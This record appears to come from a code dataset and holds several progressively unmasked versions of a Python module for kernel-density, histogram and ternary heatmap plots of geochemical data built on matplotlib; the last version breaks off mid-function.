"step-2": "<mask token>\n\n\ndef density(arr, ax=None, logx=False, logy=False, bins=25, mode='density',\n extent=None, contours=[], percentiles=True, relim=True, cmap=\n DEFAULT_CONT_COLORMAP, shading='auto', vmin=0.0, colorbar=False, **kwargs):\n \"\"\"\n Creates diagramatic representation of data density and/or frequency for either\n binary diagrams (X-Y) or ternary plots.\n Additional arguments are typically forwarded\n to respective :mod:`matplotlib` functions\n :func:`~matplotlib.pyplot.pcolormesh`,\n :func:`~matplotlib.pyplot.hist2d`,\n :func:`~matplotlib.pyplot.hexbin`,\n :func:`~matplotlib.pyplot.contour`, and\n :func:`~matplotlib.pyplot.contourf` (see Other Parameters, below).\n\n Parameters\n ----------\n arr : :class:`numpy.ndarray`\n Dataframe from which to draw data.\n ax : :class:`matplotlib.axes.Axes`, `None`\n The subplot to draw on.\n logx : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the x axis. Values strictly >0 required.\n logy : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the y axis. Values strictly >0 required.\n bins : :class:`int`, 20\n Number of bins used in the gridded functions (histograms, KDE evaluation grid).\n mode : :class:`str`, 'density'\n Different modes used here: ['density', 'hexbin', 'hist2d']\n extent : :class:`list`\n Predetermined extent of the grid for which to from the histogram/KDE. In the\n general form (xmin, xmax, ymin, ymax).\n contours : :class:`list`\n Contours to add to the plot, where :code:`mode='density'` is used.\n percentiles : :class:`bool`, `True`\n Whether contours specified are to be converted to percentiles.\n relim : :class:`bool`, :code:`True`\n Whether to relimit the plot based on xmin, xmax values.\n cmap : :class:`matplotlib.colors.Colormap`\n Colormap for mapping surfaces.\n vmin : :class:`float`, 0.\n Minimum value for colormap.\n shading : :class:`str`, 'auto'\n Shading to apply to pcolormesh.\n colorbar : :class:`bool`, False\n Whether to append a linked colorbar to the generated mappable image.\n\n {otherparams}\n\n Returns\n -------\n :class:`matplotlib.axes.Axes`\n Axes on which the densityplot is plotted.\n\n .. seealso::\n\n Functions:\n\n :func:`matplotlib.pyplot.pcolormesh`\n :func:`matplotlib.pyplot.hist2d`\n :func:`matplotlib.pyplot.contourf`\n\n Notes\n -----\n The default density estimates and derived contours are generated based on\n kernel density estimates. Assumptions around e.g. 95% of points lying within\n a 95% contour won't necessarily be valid for non-normally distributed data\n (instead, this represents the approximate 95% percentile on the kernel\n density estimate). 
Note that contours are currently only generated; for\n `mode=\"density\"`; future updates may allow the use of a histogram\n basis, which would give results closer to 95% data percentiles.\n\n Todo\n ----\n * Allow generation of contours from histogram data, rather than just\n the kernel density estimate.\n * Implement an option and filter to 'scatter' points below the minimum threshold\n or maximum percentile contours.\n \"\"\"\n if (mode == 'density') & np.isclose(vmin, 0.0):\n vmin = 0.02\n if arr.shape[-1] == 3:\n projection = 'ternary'\n else:\n projection = None\n ax = init_axes(ax=ax, projection=projection, **kwargs)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n background_color = *ax.patch.get_facecolor()[:-1], 0.0\n if cmap is not None:\n if isinstance(cmap, str):\n cmap = plt.get_cmap(cmap)\n cmap = copy.copy(cmap)\n cmap.set_under((1, 1, 1, 0))\n if mode == 'density':\n cbarlabel = 'Kernel Density Estimate'\n else:\n cbarlabel = 'Frequency'\n valid_rows = np.isfinite(arr).all(axis=-1)\n if mode in ['hexbin', 'hist2d'] and contours:\n raise NotImplementedError(\n \"Contours are not currently implemented for 'hexbin' or 'hist2d' modes.\"\n )\n if arr.size > 0 and valid_rows.any():\n arr = arr[valid_rows]\n if projection is None:\n x, y = arr.T\n grid = DensityGrid(x, y, bins=bins, logx=logx, logy=logy,\n extent=extent, **subkwargs(kwargs, DensityGrid))\n if mode == 'hexbin':\n mappable = ax.hexbin(x, y, gridsize=bins, cmap=cmap, extent\n =grid.get_hex_extent(), xscale=['linear', 'log'][logx],\n yscale=['linear', 'log'][logy], **subkwargs(kwargs, ax.\n hexbin))\n elif mode == 'hist2d':\n _, _, _, im = ax.hist2d(x, y, bins=[grid.grid_xe, grid.\n grid_ye], range=grid.get_range(), cmap=cmap, cmin=[0, 1\n ][vmin > 0], **subkwargs(kwargs, ax.hist2d))\n mappable = im\n elif mode == 'density':\n zei = grid.kdefrom(arr, xtransform=[lambda x: x, np.log][\n logx], ytransform=[lambda y: y, np.log][logy], mode=\n 'edges', **subkwargs(kwargs, grid.kdefrom))\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zei, [1.0 -\n vmin])[1][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'\n .format(vmin))\n if not contours:\n mappable = pcolor(grid.grid_xei, grid.grid_yei, zei,\n cmap=cmap, vmin=vmin, shading=shading, **subkwargs(\n kwargs, pcolor))\n mappable.set_edgecolor(background_color)\n mappable.set_linestyle('None')\n mappable.set_lw(0.0)\n else:\n mappable = _add_contours(grid.grid_xei, grid.grid_yei,\n zi=zei.reshape(grid.grid_xei.shape), ax=ax,\n contours=contours, percentiles=percentiles, cmap=\n cmap, vmin=vmin, **kwargs)\n if relim and extent is not None:\n ax.axis(extent)\n elif projection == 'ternary':\n if shading == 'auto':\n shading = 'flat'\n arr[~(arr > 0).all(axis=1), :] = np.nan\n arr = close(arr)\n if mode == 'hexbin':\n raise NotImplementedError\n coords, zi, _ = ternary_heatmap(arr, bins=bins, mode=mode)\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zi, [1.0 - vmin])[1\n ][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'.\n format(vmin))\n fltr = (zi != 0) & (zi >= vmin)\n coords = coords[fltr.flatten(), :]\n zi = zi[fltr]\n if not contours:\n tri_poly_collection = pcolor(*coords.T, zi.flatten(), cmap=\n cmap, vmin=vmin, shading=shading, **subkwargs(kwargs,\n pcolor))\n mappable = tri_poly_collection\n else:\n mappable = _add_contours(*coords.T, zi=zi.flatten(), ax=ax,\n contours=contours, percentiles=percentiles, cmap=cmap,\n vmin=vmin, **kwargs)\n ax.set_aspect('equal')\n elif not arr.ndim in [0, 1, 
2]:\n raise NotImplementedError\n if colorbar:\n cbkwargs = kwargs.copy()\n cbkwargs['label'] = cbarlabel\n add_colorbar(mappable, **cbkwargs)\n return ax\n\n\ndef _add_contours(*coords, zi=None, ax=None, contours=[], cmap=\n DEFAULT_CONT_COLORMAP, vmin=0.0, extent=None, **kwargs):\n \"\"\"\n Add density-based contours to a plot.\n \"\"\"\n percentiles = kwargs.pop('percentiles', True)\n levels = contours or kwargs.get('levels', None)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n if percentiles and not isinstance(levels, int):\n _cs = plot_Z_percentiles(*coords, zi=zi, ax=ax, percentiles=levels,\n extent=extent, cmap=cmap, **kwargs)\n mappable = _cs\n else:\n if levels is None:\n levels = MaxNLocator(nbins=10).tick_values(zi.min(), zi.max())\n elif isinstance(levels, int):\n levels = MaxNLocator(nbins=levels).tick_values(zi.min(), zi.max())\n else:\n raise NotImplementedError\n mappable = contourf(*coords, zi, extent=extent, levels=levels, cmap\n =cmap, vmin=vmin, **kwargs)\n contour(*coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=\n vmin, **kwargs)\n return mappable\n\n\n<mask token>\n",
"step-3": "<mask token>\nlogger = Handle(__name__)\n\n\ndef density(arr, ax=None, logx=False, logy=False, bins=25, mode='density',\n extent=None, contours=[], percentiles=True, relim=True, cmap=\n DEFAULT_CONT_COLORMAP, shading='auto', vmin=0.0, colorbar=False, **kwargs):\n \"\"\"\n Creates diagramatic representation of data density and/or frequency for either\n binary diagrams (X-Y) or ternary plots.\n Additional arguments are typically forwarded\n to respective :mod:`matplotlib` functions\n :func:`~matplotlib.pyplot.pcolormesh`,\n :func:`~matplotlib.pyplot.hist2d`,\n :func:`~matplotlib.pyplot.hexbin`,\n :func:`~matplotlib.pyplot.contour`, and\n :func:`~matplotlib.pyplot.contourf` (see Other Parameters, below).\n\n Parameters\n ----------\n arr : :class:`numpy.ndarray`\n Dataframe from which to draw data.\n ax : :class:`matplotlib.axes.Axes`, `None`\n The subplot to draw on.\n logx : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the x axis. Values strictly >0 required.\n logy : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the y axis. Values strictly >0 required.\n bins : :class:`int`, 20\n Number of bins used in the gridded functions (histograms, KDE evaluation grid).\n mode : :class:`str`, 'density'\n Different modes used here: ['density', 'hexbin', 'hist2d']\n extent : :class:`list`\n Predetermined extent of the grid for which to from the histogram/KDE. In the\n general form (xmin, xmax, ymin, ymax).\n contours : :class:`list`\n Contours to add to the plot, where :code:`mode='density'` is used.\n percentiles : :class:`bool`, `True`\n Whether contours specified are to be converted to percentiles.\n relim : :class:`bool`, :code:`True`\n Whether to relimit the plot based on xmin, xmax values.\n cmap : :class:`matplotlib.colors.Colormap`\n Colormap for mapping surfaces.\n vmin : :class:`float`, 0.\n Minimum value for colormap.\n shading : :class:`str`, 'auto'\n Shading to apply to pcolormesh.\n colorbar : :class:`bool`, False\n Whether to append a linked colorbar to the generated mappable image.\n\n {otherparams}\n\n Returns\n -------\n :class:`matplotlib.axes.Axes`\n Axes on which the densityplot is plotted.\n\n .. seealso::\n\n Functions:\n\n :func:`matplotlib.pyplot.pcolormesh`\n :func:`matplotlib.pyplot.hist2d`\n :func:`matplotlib.pyplot.contourf`\n\n Notes\n -----\n The default density estimates and derived contours are generated based on\n kernel density estimates. Assumptions around e.g. 95% of points lying within\n a 95% contour won't necessarily be valid for non-normally distributed data\n (instead, this represents the approximate 95% percentile on the kernel\n density estimate). 
Note that contours are currently only generated; for\n `mode=\"density\"`; future updates may allow the use of a histogram\n basis, which would give results closer to 95% data percentiles.\n\n Todo\n ----\n * Allow generation of contours from histogram data, rather than just\n the kernel density estimate.\n * Implement an option and filter to 'scatter' points below the minimum threshold\n or maximum percentile contours.\n \"\"\"\n if (mode == 'density') & np.isclose(vmin, 0.0):\n vmin = 0.02\n if arr.shape[-1] == 3:\n projection = 'ternary'\n else:\n projection = None\n ax = init_axes(ax=ax, projection=projection, **kwargs)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n background_color = *ax.patch.get_facecolor()[:-1], 0.0\n if cmap is not None:\n if isinstance(cmap, str):\n cmap = plt.get_cmap(cmap)\n cmap = copy.copy(cmap)\n cmap.set_under((1, 1, 1, 0))\n if mode == 'density':\n cbarlabel = 'Kernel Density Estimate'\n else:\n cbarlabel = 'Frequency'\n valid_rows = np.isfinite(arr).all(axis=-1)\n if mode in ['hexbin', 'hist2d'] and contours:\n raise NotImplementedError(\n \"Contours are not currently implemented for 'hexbin' or 'hist2d' modes.\"\n )\n if arr.size > 0 and valid_rows.any():\n arr = arr[valid_rows]\n if projection is None:\n x, y = arr.T\n grid = DensityGrid(x, y, bins=bins, logx=logx, logy=logy,\n extent=extent, **subkwargs(kwargs, DensityGrid))\n if mode == 'hexbin':\n mappable = ax.hexbin(x, y, gridsize=bins, cmap=cmap, extent\n =grid.get_hex_extent(), xscale=['linear', 'log'][logx],\n yscale=['linear', 'log'][logy], **subkwargs(kwargs, ax.\n hexbin))\n elif mode == 'hist2d':\n _, _, _, im = ax.hist2d(x, y, bins=[grid.grid_xe, grid.\n grid_ye], range=grid.get_range(), cmap=cmap, cmin=[0, 1\n ][vmin > 0], **subkwargs(kwargs, ax.hist2d))\n mappable = im\n elif mode == 'density':\n zei = grid.kdefrom(arr, xtransform=[lambda x: x, np.log][\n logx], ytransform=[lambda y: y, np.log][logy], mode=\n 'edges', **subkwargs(kwargs, grid.kdefrom))\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zei, [1.0 -\n vmin])[1][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'\n .format(vmin))\n if not contours:\n mappable = pcolor(grid.grid_xei, grid.grid_yei, zei,\n cmap=cmap, vmin=vmin, shading=shading, **subkwargs(\n kwargs, pcolor))\n mappable.set_edgecolor(background_color)\n mappable.set_linestyle('None')\n mappable.set_lw(0.0)\n else:\n mappable = _add_contours(grid.grid_xei, grid.grid_yei,\n zi=zei.reshape(grid.grid_xei.shape), ax=ax,\n contours=contours, percentiles=percentiles, cmap=\n cmap, vmin=vmin, **kwargs)\n if relim and extent is not None:\n ax.axis(extent)\n elif projection == 'ternary':\n if shading == 'auto':\n shading = 'flat'\n arr[~(arr > 0).all(axis=1), :] = np.nan\n arr = close(arr)\n if mode == 'hexbin':\n raise NotImplementedError\n coords, zi, _ = ternary_heatmap(arr, bins=bins, mode=mode)\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zi, [1.0 - vmin])[1\n ][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'.\n format(vmin))\n fltr = (zi != 0) & (zi >= vmin)\n coords = coords[fltr.flatten(), :]\n zi = zi[fltr]\n if not contours:\n tri_poly_collection = pcolor(*coords.T, zi.flatten(), cmap=\n cmap, vmin=vmin, shading=shading, **subkwargs(kwargs,\n pcolor))\n mappable = tri_poly_collection\n else:\n mappable = _add_contours(*coords.T, zi=zi.flatten(), ax=ax,\n contours=contours, percentiles=percentiles, cmap=cmap,\n vmin=vmin, **kwargs)\n ax.set_aspect('equal')\n elif not arr.ndim in [0, 1, 
2]:\n raise NotImplementedError\n if colorbar:\n cbkwargs = kwargs.copy()\n cbkwargs['label'] = cbarlabel\n add_colorbar(mappable, **cbkwargs)\n return ax\n\n\ndef _add_contours(*coords, zi=None, ax=None, contours=[], cmap=\n DEFAULT_CONT_COLORMAP, vmin=0.0, extent=None, **kwargs):\n \"\"\"\n Add density-based contours to a plot.\n \"\"\"\n percentiles = kwargs.pop('percentiles', True)\n levels = contours or kwargs.get('levels', None)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n if percentiles and not isinstance(levels, int):\n _cs = plot_Z_percentiles(*coords, zi=zi, ax=ax, percentiles=levels,\n extent=extent, cmap=cmap, **kwargs)\n mappable = _cs\n else:\n if levels is None:\n levels = MaxNLocator(nbins=10).tick_values(zi.min(), zi.max())\n elif isinstance(levels, int):\n levels = MaxNLocator(nbins=levels).tick_values(zi.min(), zi.max())\n else:\n raise NotImplementedError\n mappable = contourf(*coords, zi, extent=extent, levels=levels, cmap\n =cmap, vmin=vmin, **kwargs)\n contour(*coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=\n vmin, **kwargs)\n return mappable\n\n\n_add_additional_parameters = True\ndensity.__doc__ = density.__doc__.format(otherparams=['',\n get_additional_params(density, plt.pcolormesh, plt.hist2d, plt.hexbin,\n plt.contour, plt.contourf, header='Other Parameters', indent=4,\n subsections=True)][_add_additional_parameters])\n",
"step-4": "<mask token>\nimport copy\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.ticker import MaxNLocator\nfrom ...comp.codata import close\nfrom ...util.log import Handle\nfrom ...util.meta import get_additional_params, subkwargs\nfrom ...util.plot.axes import add_colorbar, init_axes\nfrom ...util.plot.density import get_axis_density_methods, percentile_contour_values_from_meshz, plot_Z_percentiles\nfrom ...util.plot.style import DEFAULT_CONT_COLORMAP\nfrom .grid import DensityGrid\nfrom .ternary import ternary_heatmap\nlogger = Handle(__name__)\n\n\ndef density(arr, ax=None, logx=False, logy=False, bins=25, mode='density',\n extent=None, contours=[], percentiles=True, relim=True, cmap=\n DEFAULT_CONT_COLORMAP, shading='auto', vmin=0.0, colorbar=False, **kwargs):\n \"\"\"\n Creates diagramatic representation of data density and/or frequency for either\n binary diagrams (X-Y) or ternary plots.\n Additional arguments are typically forwarded\n to respective :mod:`matplotlib` functions\n :func:`~matplotlib.pyplot.pcolormesh`,\n :func:`~matplotlib.pyplot.hist2d`,\n :func:`~matplotlib.pyplot.hexbin`,\n :func:`~matplotlib.pyplot.contour`, and\n :func:`~matplotlib.pyplot.contourf` (see Other Parameters, below).\n\n Parameters\n ----------\n arr : :class:`numpy.ndarray`\n Dataframe from which to draw data.\n ax : :class:`matplotlib.axes.Axes`, `None`\n The subplot to draw on.\n logx : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the x axis. Values strictly >0 required.\n logy : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the y axis. Values strictly >0 required.\n bins : :class:`int`, 20\n Number of bins used in the gridded functions (histograms, KDE evaluation grid).\n mode : :class:`str`, 'density'\n Different modes used here: ['density', 'hexbin', 'hist2d']\n extent : :class:`list`\n Predetermined extent of the grid for which to from the histogram/KDE. In the\n general form (xmin, xmax, ymin, ymax).\n contours : :class:`list`\n Contours to add to the plot, where :code:`mode='density'` is used.\n percentiles : :class:`bool`, `True`\n Whether contours specified are to be converted to percentiles.\n relim : :class:`bool`, :code:`True`\n Whether to relimit the plot based on xmin, xmax values.\n cmap : :class:`matplotlib.colors.Colormap`\n Colormap for mapping surfaces.\n vmin : :class:`float`, 0.\n Minimum value for colormap.\n shading : :class:`str`, 'auto'\n Shading to apply to pcolormesh.\n colorbar : :class:`bool`, False\n Whether to append a linked colorbar to the generated mappable image.\n\n {otherparams}\n\n Returns\n -------\n :class:`matplotlib.axes.Axes`\n Axes on which the densityplot is plotted.\n\n .. seealso::\n\n Functions:\n\n :func:`matplotlib.pyplot.pcolormesh`\n :func:`matplotlib.pyplot.hist2d`\n :func:`matplotlib.pyplot.contourf`\n\n Notes\n -----\n The default density estimates and derived contours are generated based on\n kernel density estimates. Assumptions around e.g. 95% of points lying within\n a 95% contour won't necessarily be valid for non-normally distributed data\n (instead, this represents the approximate 95% percentile on the kernel\n density estimate). 
Note that contours are currently only generated; for\n `mode=\"density\"`; future updates may allow the use of a histogram\n basis, which would give results closer to 95% data percentiles.\n\n Todo\n ----\n * Allow generation of contours from histogram data, rather than just\n the kernel density estimate.\n * Implement an option and filter to 'scatter' points below the minimum threshold\n or maximum percentile contours.\n \"\"\"\n if (mode == 'density') & np.isclose(vmin, 0.0):\n vmin = 0.02\n if arr.shape[-1] == 3:\n projection = 'ternary'\n else:\n projection = None\n ax = init_axes(ax=ax, projection=projection, **kwargs)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n background_color = *ax.patch.get_facecolor()[:-1], 0.0\n if cmap is not None:\n if isinstance(cmap, str):\n cmap = plt.get_cmap(cmap)\n cmap = copy.copy(cmap)\n cmap.set_under((1, 1, 1, 0))\n if mode == 'density':\n cbarlabel = 'Kernel Density Estimate'\n else:\n cbarlabel = 'Frequency'\n valid_rows = np.isfinite(arr).all(axis=-1)\n if mode in ['hexbin', 'hist2d'] and contours:\n raise NotImplementedError(\n \"Contours are not currently implemented for 'hexbin' or 'hist2d' modes.\"\n )\n if arr.size > 0 and valid_rows.any():\n arr = arr[valid_rows]\n if projection is None:\n x, y = arr.T\n grid = DensityGrid(x, y, bins=bins, logx=logx, logy=logy,\n extent=extent, **subkwargs(kwargs, DensityGrid))\n if mode == 'hexbin':\n mappable = ax.hexbin(x, y, gridsize=bins, cmap=cmap, extent\n =grid.get_hex_extent(), xscale=['linear', 'log'][logx],\n yscale=['linear', 'log'][logy], **subkwargs(kwargs, ax.\n hexbin))\n elif mode == 'hist2d':\n _, _, _, im = ax.hist2d(x, y, bins=[grid.grid_xe, grid.\n grid_ye], range=grid.get_range(), cmap=cmap, cmin=[0, 1\n ][vmin > 0], **subkwargs(kwargs, ax.hist2d))\n mappable = im\n elif mode == 'density':\n zei = grid.kdefrom(arr, xtransform=[lambda x: x, np.log][\n logx], ytransform=[lambda y: y, np.log][logy], mode=\n 'edges', **subkwargs(kwargs, grid.kdefrom))\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zei, [1.0 -\n vmin])[1][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'\n .format(vmin))\n if not contours:\n mappable = pcolor(grid.grid_xei, grid.grid_yei, zei,\n cmap=cmap, vmin=vmin, shading=shading, **subkwargs(\n kwargs, pcolor))\n mappable.set_edgecolor(background_color)\n mappable.set_linestyle('None')\n mappable.set_lw(0.0)\n else:\n mappable = _add_contours(grid.grid_xei, grid.grid_yei,\n zi=zei.reshape(grid.grid_xei.shape), ax=ax,\n contours=contours, percentiles=percentiles, cmap=\n cmap, vmin=vmin, **kwargs)\n if relim and extent is not None:\n ax.axis(extent)\n elif projection == 'ternary':\n if shading == 'auto':\n shading = 'flat'\n arr[~(arr > 0).all(axis=1), :] = np.nan\n arr = close(arr)\n if mode == 'hexbin':\n raise NotImplementedError\n coords, zi, _ = ternary_heatmap(arr, bins=bins, mode=mode)\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zi, [1.0 - vmin])[1\n ][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'.\n format(vmin))\n fltr = (zi != 0) & (zi >= vmin)\n coords = coords[fltr.flatten(), :]\n zi = zi[fltr]\n if not contours:\n tri_poly_collection = pcolor(*coords.T, zi.flatten(), cmap=\n cmap, vmin=vmin, shading=shading, **subkwargs(kwargs,\n pcolor))\n mappable = tri_poly_collection\n else:\n mappable = _add_contours(*coords.T, zi=zi.flatten(), ax=ax,\n contours=contours, percentiles=percentiles, cmap=cmap,\n vmin=vmin, **kwargs)\n ax.set_aspect('equal')\n elif not arr.ndim in [0, 1, 
2]:\n raise NotImplementedError\n if colorbar:\n cbkwargs = kwargs.copy()\n cbkwargs['label'] = cbarlabel\n add_colorbar(mappable, **cbkwargs)\n return ax\n\n\ndef _add_contours(*coords, zi=None, ax=None, contours=[], cmap=\n DEFAULT_CONT_COLORMAP, vmin=0.0, extent=None, **kwargs):\n \"\"\"\n Add density-based contours to a plot.\n \"\"\"\n percentiles = kwargs.pop('percentiles', True)\n levels = contours or kwargs.get('levels', None)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n if percentiles and not isinstance(levels, int):\n _cs = plot_Z_percentiles(*coords, zi=zi, ax=ax, percentiles=levels,\n extent=extent, cmap=cmap, **kwargs)\n mappable = _cs\n else:\n if levels is None:\n levels = MaxNLocator(nbins=10).tick_values(zi.min(), zi.max())\n elif isinstance(levels, int):\n levels = MaxNLocator(nbins=levels).tick_values(zi.min(), zi.max())\n else:\n raise NotImplementedError\n mappable = contourf(*coords, zi, extent=extent, levels=levels, cmap\n =cmap, vmin=vmin, **kwargs)\n contour(*coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=\n vmin, **kwargs)\n return mappable\n\n\n_add_additional_parameters = True\ndensity.__doc__ = density.__doc__.format(otherparams=['',\n get_additional_params(density, plt.pcolormesh, plt.hist2d, plt.hexbin,\n plt.contour, plt.contourf, header='Other Parameters', indent=4,\n subsections=True)][_add_additional_parameters])\n",
"step-5": "\"\"\"\nKernel desnity estimation plots for geochemical data.\n\"\"\"\nimport copy\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.ticker import MaxNLocator\n\nfrom ...comp.codata import close\nfrom ...util.log import Handle\nfrom ...util.meta import get_additional_params, subkwargs\nfrom ...util.plot.axes import add_colorbar, init_axes\nfrom ...util.plot.density import (\n get_axis_density_methods,\n percentile_contour_values_from_meshz,\n plot_Z_percentiles,\n)\nfrom ...util.plot.style import DEFAULT_CONT_COLORMAP\nfrom .grid import DensityGrid\nfrom .ternary import ternary_heatmap\n\nlogger = Handle(__name__)\n\n\ndef density(\n arr,\n ax=None,\n logx=False,\n logy=False,\n bins=25,\n mode=\"density\",\n extent=None,\n contours=[],\n percentiles=True,\n relim=True,\n cmap=DEFAULT_CONT_COLORMAP,\n shading=\"auto\",\n vmin=0.0,\n colorbar=False,\n **kwargs\n):\n \"\"\"\n Creates diagramatic representation of data density and/or frequency for either\n binary diagrams (X-Y) or ternary plots.\n Additional arguments are typically forwarded\n to respective :mod:`matplotlib` functions\n :func:`~matplotlib.pyplot.pcolormesh`,\n :func:`~matplotlib.pyplot.hist2d`,\n :func:`~matplotlib.pyplot.hexbin`,\n :func:`~matplotlib.pyplot.contour`, and\n :func:`~matplotlib.pyplot.contourf` (see Other Parameters, below).\n\n Parameters\n ----------\n arr : :class:`numpy.ndarray`\n Dataframe from which to draw data.\n ax : :class:`matplotlib.axes.Axes`, `None`\n The subplot to draw on.\n logx : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the x axis. Values strictly >0 required.\n logy : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the y axis. Values strictly >0 required.\n bins : :class:`int`, 20\n Number of bins used in the gridded functions (histograms, KDE evaluation grid).\n mode : :class:`str`, 'density'\n Different modes used here: ['density', 'hexbin', 'hist2d']\n extent : :class:`list`\n Predetermined extent of the grid for which to from the histogram/KDE. In the\n general form (xmin, xmax, ymin, ymax).\n contours : :class:`list`\n Contours to add to the plot, where :code:`mode='density'` is used.\n percentiles : :class:`bool`, `True`\n Whether contours specified are to be converted to percentiles.\n relim : :class:`bool`, :code:`True`\n Whether to relimit the plot based on xmin, xmax values.\n cmap : :class:`matplotlib.colors.Colormap`\n Colormap for mapping surfaces.\n vmin : :class:`float`, 0.\n Minimum value for colormap.\n shading : :class:`str`, 'auto'\n Shading to apply to pcolormesh.\n colorbar : :class:`bool`, False\n Whether to append a linked colorbar to the generated mappable image.\n\n {otherparams}\n\n Returns\n -------\n :class:`matplotlib.axes.Axes`\n Axes on which the densityplot is plotted.\n\n .. seealso::\n\n Functions:\n\n :func:`matplotlib.pyplot.pcolormesh`\n :func:`matplotlib.pyplot.hist2d`\n :func:`matplotlib.pyplot.contourf`\n\n Notes\n -----\n The default density estimates and derived contours are generated based on\n kernel density estimates. Assumptions around e.g. 95% of points lying within\n a 95% contour won't necessarily be valid for non-normally distributed data\n (instead, this represents the approximate 95% percentile on the kernel\n density estimate). 
Note that contours are currently only generated; for\n `mode=\"density\"`; future updates may allow the use of a histogram\n basis, which would give results closer to 95% data percentiles.\n\n Todo\n ----\n * Allow generation of contours from histogram data, rather than just\n the kernel density estimate.\n * Implement an option and filter to 'scatter' points below the minimum threshold\n or maximum percentile contours.\n \"\"\"\n if (mode == \"density\") & np.isclose(vmin, 0.0): # if vmin is not specified\n vmin = 0.02 # 2% max height | 98th percentile\n\n if arr.shape[-1] == 3:\n projection = \"ternary\"\n else:\n projection = None\n\n ax = init_axes(ax=ax, projection=projection, **kwargs)\n\n pcolor, contour, contourf = get_axis_density_methods(ax)\n background_color = (*ax.patch.get_facecolor()[:-1], 0.0)\n\n if cmap is not None:\n if isinstance(cmap, str):\n cmap = plt.get_cmap(cmap)\n cmap = copy.copy(cmap) # without this, it would modify the global cmap\n cmap.set_under((1, 1, 1, 0))\n\n if mode == \"density\":\n cbarlabel = \"Kernel Density Estimate\"\n else:\n cbarlabel = \"Frequency\"\n\n valid_rows = np.isfinite(arr).all(axis=-1)\n\n if (mode in [\"hexbin\", \"hist2d\"]) and contours:\n raise NotImplementedError(\n \"Contours are not currently implemented for 'hexbin' or 'hist2d' modes.\"\n )\n\n if (arr.size > 0) and valid_rows.any():\n # Data can't be plotted if there's any nans, so we can exclude these\n arr = arr[valid_rows]\n\n if projection is None: # binary\n x, y = arr.T\n grid = DensityGrid(\n x,\n y,\n bins=bins,\n logx=logx,\n logy=logy,\n extent=extent,\n **subkwargs(kwargs, DensityGrid)\n )\n if mode == \"hexbin\":\n # extent values are exponents (i.e. 3 -> 10**3)\n mappable = ax.hexbin(\n x,\n y,\n gridsize=bins,\n cmap=cmap,\n extent=grid.get_hex_extent(),\n xscale=[\"linear\", \"log\"][logx],\n yscale=[\"linear\", \"log\"][logy],\n **subkwargs(kwargs, ax.hexbin)\n )\n\n elif mode == \"hist2d\":\n _, _, _, im = ax.hist2d(\n x,\n y,\n bins=[grid.grid_xe, grid.grid_ye],\n range=grid.get_range(),\n cmap=cmap,\n cmin=[0, 1][vmin > 0],\n **subkwargs(kwargs, ax.hist2d)\n )\n mappable = im\n\n elif mode == \"density\":\n zei = grid.kdefrom(\n arr,\n xtransform=[lambda x: x, np.log][logx],\n ytransform=[lambda y: y, np.log][logy],\n mode=\"edges\",\n **subkwargs(kwargs, grid.kdefrom)\n )\n\n if percentiles: # 98th percentile\n vmin = percentile_contour_values_from_meshz(zei, [1.0 - vmin])[1][0]\n logger.debug(\n \"Updating `vmin` to percentile equiv: {:.2f}\".format(vmin)\n )\n\n if not contours:\n # pcolormesh using bin edges\n mappable = pcolor(\n grid.grid_xei,\n grid.grid_yei,\n zei,\n cmap=cmap,\n vmin=vmin,\n shading=shading,\n **subkwargs(kwargs, pcolor)\n )\n mappable.set_edgecolor(background_color)\n mappable.set_linestyle(\"None\")\n mappable.set_lw(0.0)\n else:\n mappable = _add_contours(\n grid.grid_xei,\n grid.grid_yei,\n zi=zei.reshape(grid.grid_xei.shape),\n ax=ax,\n contours=contours,\n percentiles=percentiles,\n cmap=cmap,\n vmin=vmin,\n **kwargs\n )\n if relim and (extent is not None):\n ax.axis(extent)\n elif projection == \"ternary\": # ternary\n if shading == \"auto\":\n shading = \"flat\" # auto cant' be passed to tripcolor\n # zeros make nans in this case, due to the heatmap calculations\n arr[~(arr > 0).all(axis=1), :] = np.nan\n arr = close(arr)\n if mode == \"hexbin\":\n raise NotImplementedError\n # density, histogram etc parsed here\n coords, zi, _ = ternary_heatmap(arr, bins=bins, mode=mode)\n\n if percentiles: # 98th percentile\n vmin = 
